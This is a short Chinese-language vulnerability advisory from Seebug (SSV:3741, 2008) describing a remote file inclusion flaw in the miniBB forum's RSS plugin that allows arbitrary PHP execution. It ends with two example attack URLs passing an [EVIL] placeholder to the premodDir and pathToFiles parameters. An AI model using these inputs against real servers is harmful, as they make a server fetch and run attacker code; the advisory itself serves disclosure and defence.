miniBB RSS插件远程文件包含漏洞

2008-07-30T00:00:00
ID SSV:3741
Type seebug
Reporter Root
Modified 2008-07-30T00:00:00

Description

BUGTRAQ ID: 30421 CNCAN ID:CNCAN-2008073001

miniBB是一款基于PHP的论坛程序。 miniBB不正确过滤用户提交的参数,远程攻击者可以利用漏洞以WEB进程权限执行任意PHP代码。 miniBB包含的RSS插件脚本不正确过滤用户提交的WEB参数,指定远程服务器上的任意文件作为包含对象,可导致以WEB进程权限执行任意PHP代码。

Paul Puzyrev RSS 2.0 目前没有解决方案提供: <a href=http://www.minibb.com/download.html#addons target=_blank>http://www.minibb.com/download.html#addons</a>

                                        
                                            
                                                http://www.example.com/rss2.php?premodDir=[EVIL]
http://www.example.com/rss2.php?pathToFiles=[EVIL]